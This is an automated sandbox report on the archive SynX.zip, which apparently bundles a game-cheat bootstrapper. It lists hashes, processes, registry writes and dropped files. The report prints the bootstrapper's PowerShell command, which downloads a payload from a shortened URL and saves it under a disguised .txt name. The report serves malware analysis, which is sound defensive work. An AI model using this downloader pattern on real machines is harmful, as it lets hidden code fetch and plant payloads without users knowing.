General Info

File name

SynX.zip

Full analysis
https://app.any.run/tasks/f59e9b1b-b0aa-43c1-a297-b1dc1c639b78
Verdict
Malicious activity
Analysis date
5/15/2019, 00:23:07
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:

MIME:
application/zip
File info:
Zip archive data, at least v1.0 to extract
MD5

fb43eb87f2a5df9c5c543539a14e9747

SHA1

ca726e3d93ae4c4586c934ffbe4d723ad28604a9

SHA256

b290bc27bc4a2698e30b19d53ca79b7e082e38597c702e5578e5c059b48f1338

SSDEEP

49152:+o/OREwNSSiHU3n4ga8Gki9XmT69nos4/M:Z/ORJcSXn4ga91mT69nJ2M

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
60 seconds
Additional time used
none
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (73.0.3683.75)
  • Google Update Helper (1.3.33.23)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 65.0.2 (x86 en-US) (65.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Application was dropped or rewritten from another process
  • BootStrapper.exe (PID: 3564)
Executes PowerShell scripts
  • cmd.exe (PID: 2496)
Creates files in the user directory
  • powershell.exe (PID: 2756)
Starts CMD.EXE for commands execution
  • BootStrapper.exe (PID: 3564)
Executable content was dropped or overwritten
  • WinRAR.exe (PID: 3164)

No info indicators.

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.zip
|   ZIP compressed archive (100%)
EXIF
ZIP
ZipRequiredVersion:
10
ZipBitFlag:
null
ZipCompression:
None
ZipModifyDate:
2019:05:13 19:09:27
ZipCRC:
0x00000000
ZipCompressedSize:
null
ZipUncompressedSize:
null
ZipFileName:
SynX/

Screenshots

Processes

Total processes
36
Monitored processes
4
Malicious processes
2
Suspicious processes
0

Behavior graph

+
start winrar.exe bootstrapper.exe no specs cmd.exe no specs powershell.exe
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
3164
CMD
"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\SynX.zip"
Path
C:\Program Files\WinRAR\WinRAR.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Alexander Roshal
Description
WinRAR archiver
Version
5.60.0
Modules
Image
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\uxtheme.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\riched20.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\slc.dll
c:\windows\system32\imageres.dll
c:\windows\system32\mpr.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\netutils.dll
c:\windows\system32\wpdshext.dll
c:\windows\system32\winmm.dll
c:\windows\system32\portabledeviceapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\audiodev.dll
c:\windows\system32\wmvcore.dll
c:\windows\system32\wmasf.dll
c:\windows\system32\ehstorapi.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\samlib.dll
c:\windows\system32\profapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll

PID
3564
CMD
"C:\Users\admin\Desktop\SynX\BootStrapper.exe"
Path
C:\Users\admin\Desktop\SynX\BootStrapper.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Description
Version
Modules
Image
c:\users\admin\desktop\synx\bootstrapper.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\winmm.dll
c:\windows\system32\ole32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\propsys.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\apphelp.dll

PID
2496
CMD
"C:\Windows\system32\cmd.exe" /c "C:\Users\admin\AppData\Local\Temp\D644.tmp\D645.tmp\D646.bat C:\Users\admin\Desktop\SynX\BootStrapper.exe"
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
BootStrapper.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\apphelp.dll

PID
2756
CMD
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://rebrand.ly/eonfsiudfhsiudfh', 'dfaoijf9weafd98asdfw9ae8sf.txt')"
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\security.dll
c:\windows\system32\credssp.dll
c:\windows\system32\schannel.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll

Registry activity

Total events
699
Read events
599
Write events
100
Delete events
0

Modification events

PID
Process
Operation
Key
Name
Value
3164
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtBMP
3164
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtIcon
3164
WinRAR.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
3164
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
0
C:\Users\admin\AppData\Local\Temp\SynX.zip
3164
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
name
120
3164
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
size
80
3164
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
type
120
3164
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
mtime
100
3164
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\MainWin
Placement
2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF010000006C000000C103000061020000
3164
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General
LastFolder
C:\Users\admin\AppData\Local\Temp
3164
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
name
120
3164
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
size
80
3164
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
psize
80
3164
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
type
120
3164
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
mtime
100
3164
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
crc
70
3164
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band56_0
38000000730100000402000000000000D4D0C8000000000000000000000000006C0104000000000039000000B40200000000000001000000
3164
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band56_1
38000000730100000500000000000000D4D0C8000000000000000000000000002201050000000000160000002A0000000000000002000000
3164
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band56_2
38000000730100000400000000000000D4D0C8000000000000000000000000005E0204000000000016000000640000000000000003000000
3564
BootStrapper.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3564
BootStrapper.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2756
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
2756
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
2756
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
2756
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
2756
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
2756
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
2756
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
2756
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
2756
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
2756
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
2756
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
2756
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
2756
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing

Files activity

Executable files
4
Suspicious files
2
Text files
73
Unknown types
0

Dropped files

PID
Process
Filename
Type
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\BootStrapper.exe
executable
MD5: b36f7ce4da9e1632b424b9c4ed00d081
SHA256: 9ce4827401db6974f5781e8e306dc1ebdc1c60e2230665ebc358021f0fce71d1
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\WeAreDevs_API.dll
executable
MD5: 64ebd16faf23058eb4f4b550434bdb2e
SHA256: 68472d2d047e4064a3347711b5b060a35630e70fea92a9eabb90ac6b5915b526
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\dfaoijf9weafd98asdfw9ae8sf.txt
executable
MD5: aea9af5c06fe26bb7210362cb7d74dc0
SHA256: 7b7568d89d378f2e95a289ee8033a1c7d6ed572ed6ecbe66269f80ec2af4a5f4
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\WeAreExploitersAPI.dll
executable
MD5: 23820981b2f96355d5c73b95056c5564
SHA256: 3c3cd250d2ae46ee37da5af92c3659ceed3bb087b0d50882e457d692d70bfe64
2756
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF12d876.TMP
binary
MD5: 131dc75f6d4142ca9244945a91a71e8d
SHA256: f17c463c77b5da9e795770a82e0a7fb1023023f44397f6e080721e9811b2a0c4
2756
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XBARDV9VYZHAVPWQ44TI.temp
––
MD5:  ––
SHA256:  ––
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\language\typescript\tsWorker.js
text
MD5: 1e0047691c3637ad1e0da62023ba0e0d
SHA256: 2ccc6b6b1b5d884fe8df3e7b2f2bacca0c4529b68bbfe3c547fcc74f204cc5d1
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\loader.js
text
MD5: 8a3086f6c6298f986bda09080dd003b1
SHA256: 0512d9ed3e5bb3daef94aa5c16a6c3e2ee26ffed9de00d1434ffe46a027b16b9
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\language\typescript\lib\typescriptServices.js
text
MD5: 0a1a293455f5451ba11e07386ea62d4f
SHA256: 90e98063c644749a948edd5a7801f7b00c554e3189fe7c2811926b01eaf1b41f
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\language\typescript\tsMode.js
text
MD5: 8c1a82479c380d2b2c6b096e12ee9632
SHA256: 70957c5ede2834adf1b5bc264e119f82b4e8e6c169fc8ff140d637d1c5287bd9
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\language\json\jsonMode.js
text
MD5: 44955b6c43b7aac58492233efeeb70ad
SHA256: 08af59e449f6c058514bf05c54511ee6ec83934ab9dc3e803257196b2812e8ae
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\language\html\htmlWorker.js
text
MD5: 3f5802a91a29e4504d5cd2f10ac280b8
SHA256: e80444d8fa519ff86e5c696a40843bc8392b2d3afb83118a2dd92da5497c9212
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\language\json\jsonWorker.js
text
MD5: 61e9b732bedc39b547804ac7e8897aab
SHA256: 7c6d37bb341cf59335f6a3e5e336d0de863124fa40a8f9b5f29d8da07891b649
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\editor\standalone\browser\quickOpen\symbol-sprite.svg
image
MD5: 649fb0a55b0e0fc9d79e6b7872a14c10
SHA256: fcc3026b97068f3d9e1743d36ca26b96ffdbcd2841fa9d804caccc4f249911c8
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\language\html\htmlMode.js
text
MD5: c944ad9527d22b6ca6c0d54fd0723296
SHA256: 80d6f099563af129b4deff66f7b9d4dfb27ad0058dcb5b77d927e460022dafee
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\language\css\cssMode.js
text
MD5: 40a99739f89d382c92eb26f05a9a4497
SHA256: d3108af9ffcdad3133345686646cafe3b628ad6b25a3758786b2aa7b7b51809d
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\language\css\cssWorker.js
text
MD5: 152244e2ab4f663141e9466a8282ebe8
SHA256: 288bb68a2c685957b5dc3e5353b1a03dc482b10858059063b99c1549d5fef01c
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\editor\editor.main.nls.js
text
MD5: 74dd2381ddbb5af80ce28aefed3068fc
SHA256: fdd9d64ce5284373d1541528d15e2aa8aa3a4adc11b51b3d71d3a3953f8bcc48
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\editor\editor.main.nls.zh-tw.js
text
MD5: 73031ff9956da03354038b3185222af8
SHA256: 7751df224ac12dbc2e918b12fdbaa465306b6c511e4e1587790163edac18ad46
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\editor\editor.main.nls.zh-cn.js
text
MD5: f954ac1091c6d0b640ed5f0abdcd8adb
SHA256: ac881e6f56544ed9b8dd4fd8fd8a73f1da864fb8d79d91c45f5a51f923bd5287
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\editor\editor.main.nls.ko.js
text
MD5: 9ccf83d22e9a9bfafa2000f366ac47e6
SHA256: 100ca482c015571ed9aad97c2dcc5e266b270a650ce892507443b5d4f32df64f
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\editor\editor.main.nls.ru.js
text
MD5: fd1aa66906d2b3c0c9b734b17f04d73b
SHA256: fa180f7b77ee252aefe73ba5993fbe7c89f43482358d7fd32e8e2f50b3b21bed
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\editor\editor.main.js
text
MD5: 9399a8eaa741d04b0ae6566a5ebb8106
SHA256: 93d28520c07fbca09e20886087f28797bb7bd0e6cf77400153aab5ae67e3ce18
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\editor\editor.main.nls.es.js
text
MD5: b371235f971baa51f58f123f40c4435a
SHA256: 203ff3591e02eb7b55a591e53919cc337f8dea73e6446fc3493227761c0794ba
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\editor\editor.main.nls.ja.js
text
MD5: a1f3c9e940206ca310147d644305a6e1
SHA256: ea9f5e8993017f858cd9ee70aac3d7990ca85eaf40a052025e530fb1c300837f
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\editor\editor.main.nls.de.js
text
